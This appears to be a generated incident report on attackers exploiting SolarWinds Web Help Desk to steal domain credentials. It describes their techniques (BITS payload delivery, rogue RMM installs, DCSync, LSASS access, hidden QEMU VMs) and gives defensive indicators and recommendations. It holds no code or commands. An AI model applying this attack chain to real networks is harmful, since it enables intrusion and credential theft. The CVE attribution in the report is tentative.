Full Report
So many CVEs, so little time Digital intruders exploited buggy SolarWinds Web Help Desk (WHD) instances in December to break into victims' IT environments, move laterally, and steal high-privilege credentials, according to Microsoft researchers.…
Analysis Summary
# Incident Report: SolarWinds WHD Exploitation for Credential Theft
## Executive Summary
In December 2025, threat actors exploited vulnerabilities in SolarWinds Web Help Desk (WHD) instances to gain initial access to victim IT environments. Following successful breaches, attackers executed lateral movement, stole high-privilege credentials (including Domain Admins), and established long-term persistence using legitimate tools. Microsoft researchers discovered the activity, which focused on credential theft via techniques like DLL sideloading and potential DCSync attacks.
## Incident Details
- Discovery Date: Early February 2026 (Reported via Microsoft Blog on February 6, 2026)
- Incident Date: December 2025
- Affected Organization: Multiple victim organizations (Number undisclosed)
- Sector: Undisclosed (Implied IT/General Enterprise environments hosting WHD)
- Geography: Undisclosed
## Timeline of Events
### Initial Access
- Date/Time: December 2025
- Vector: Exploitation of a SolarWinds Web Help Desk (WHD) vulnerability (exact CVE pending confirmation, potentially CVE-2025-40551, CVE-2025-40536, or previously disclosed CVE-2025-26399).
- Details: Gained an initial foothold on victim systems vulnerable to one or more known WHD flaws.
### Lateral Movement
- Following initial access, attackers spawned PowerShell to abuse the built-in **Background Intelligent Transfer Service (BITS)** for payload download and execution.
- Attackers downloaded and installed the legitimate remote monitoring and management (RMM) product, **Zoho ManageEngine**, on several hosts to gain persistent remote control.
- Threat actors enumerated sensitive domain users and groups, specifically targeting Domain Admins.
### Data Exfiltration/Impact
- Attackers leveraged high-privilege credentials to execute a **DCSync** attack in at least one case, requesting password data directly from a domain controller.
- Credentials were stolen using **DLL sideloading** against the Windows LSASS memory space.
- Persistence was established via reverse SSH and RDP access, and by creating scheduled tasks to launch QEMU virtual machines at startup to hide activity.
### Detection & Response
- Detection was performed by **Microsoft Defender**, which flagged attacker behavior, including the suspicious creation of the scheduled task/QEMU VM.
- Response actions recommended include immediate patching of WHD, credential rotation (especially for service/admin accounts linked to WHD), host isolation, and scanning for unauthorized RMM tools like ManageEngine.
## Attack Methodology
- **Initial Access:** Remote exploitation of SolarWinds WHD vulnerability (RCE or Security Bypass leading to execution).
- **Persistence:** Installation of Zoho ManageEngine RMM, establishing reverse SSH/RDP access, creation of scheduled tasks involving QEMU VM execution at startup.
- **Privilege Escalation:** Implied escalation necessary to reach the point of executing DCSync against the Domain Controller.
- **Defense Evasion:** Living off the Land (LotL) techniques using native tools like BITS for payload delivery; hiding malicious activity inside a QEMU virtual machine launched as a system scheduled task.
- **Credential Access:** DLL sideloading targeting LSASS memory.
- **Discovery:** Enumeration of sensitive domain users and groups (including Domain Admins) using the installed RMM tool.
- **Lateral Movement:** Use of Zoho ManageEngine RMM for remote control across the network; potential internal network traversal via established persistence channels.
- **Collection:** Gathering credentials via LSASS memory dumping.
- **Exfiltration:** Execution of DCSync to extract password data from the Domain Controller.
- **Impact:** Compromise of high-privilege credentials leading to potential full domain takeover.
## Impact Assessment
- **Financial:** Not quantified, but likely high due to potential domain compromise and mandatory remediation efforts.
- **Data Breach:** High-privilege credentials, including Domain Admin account information (password hashes/secrets via DCSync).
- **Operational:** Disruption due to the investigation, host isolation, and mandatory patching/credential rotation.
- **Reputational:** Potential reputational damage related to the sustained breach originating from a third-party vendor application.
## Indicators of Compromise
- **Network indicators:** Reverse SSH/RDP connections originating from compromised WHD hosts; outbound connections associated with Zoho ManageEngine traffic.
- **File indicators:** Artifacts related to Zoho ManageEngine, specifically `ToolsIQ.exe`.
- **Behavioral indicators:** Use of PowerShell abusing **BITS** for file downloads; suspicious execution of OS utilities in conjunction with unexpected remote management software; creation of scheduled tasks launching QEMU VMs; abnormal LSASS memory access patterns.
## Response Actions
- **Containment:** Apply SolarWinds WHD patches immediately; isolate known compromised hosts from the rest of the network; block external access to application admin paths.
- **Eradication:** Scan for and forcibly remove unauthorized RMM tools, particularly Zoho ManageEngine artifacts like `ToolsIQ.exe`.
- **Recovery:** Rotate credentials, starting with service and administrative accounts reachable by the WHD server. Restore access using clean credentials across affected systems.
## Lessons Learned
- Third-party application vulnerabilities (like those in WHD) remain a critical initial access vector.
- Attackers are adept at chaining existing vulnerabilities to achieve complex objectives (e.g., CVE-2025-26399 bypassing older patches).
- Living off the Land (LotL) techniques using BITS for malware delivery significantly complicate network defense and detection based solely on novel file signatures.
- Persistent unauthorized RMM tools are a major threat for long-term command and control and post-exploitation activities.
## Recommendations
- Immediately apply all available security patches for SolarWinds WHD (and monitor for future related zero-days).
- Restrict or eliminate public-facing access to administrative interfaces of all critical internal applications, especially WHD.
- Conduct aggressive hunting for unauthorized remote management software deployment (e.g., ManageEngine RMM artifacts).
- Review and restrict the use of built-in Windows features like BITS for non-standard activities.
- Implement stricter monitoring and alerting on LSASS process access, especially by unusual processes, and on DCSync operations.
- Require mandatory credential rotation for all accounts with elevated privileges on systems adjacent to software like WHD after any major security event.